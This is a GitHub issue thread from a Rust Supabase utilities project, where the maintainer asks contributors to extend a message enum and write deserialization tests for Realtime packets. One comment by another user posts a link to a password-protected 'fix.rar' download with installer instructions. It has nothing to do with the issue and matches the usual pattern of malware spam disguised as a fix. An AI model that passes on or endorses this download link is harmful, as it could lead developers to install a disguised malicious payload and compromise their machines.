### ISSUE TITLE
properly deserialize / serialize Supabase Realtime packets

### ISSUE THREAD

**Issue by roberts-pumpurs** [roberts-pumpurs/supabase-rs-utils#1]
**Is your feature request related to a problem? Please describe.**
Currently, we don't handle all of the `Supabase Realtime` packets. Which means that our realtime connection is not really usable.

**Context**
[Supabase Realtime](https://supabase.com/docs/guides/realtime?queryGroups=language&language=dart) protocol allows you to establish a WebScoket connection. You can subscribe to table changes, and receive live updates over the wire. (There's also the "presence API", and "Broadcast API" which kind of do the same thing over the same WS connection but it's not really in the scope of this ticket).

**Describe the solution you'd like**

- Our Messages enum is defined [here](https://github.com/roberts-pumpurs/supabase-rs-utils/blob/e02ec82b3bbb3833355977e5fb0c6f71fc924ea8/crates/supabase-realtime/src/message.rs?plain=1#L8).
- I have added test cases that need to be implemented [over here](https://github.com/roberts-pumpurs/supabase-rs-utils/blob/e02ec82b3bbb3833355977e5fb0c6f71fc924ea8/crates/supabase-realtime/src/message.rs?plain=1#L94-L220). 
- for each commented-out JSON, extend the Message enum (as necessary), and add a test to ensure that the message gets adequately deserialised.
- refer to [the Serde docs](https://serde.rs/enum-representations.html) to learn how to work with enums and the serde library

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by roberts-pumpurs** [comment]
closed by #3
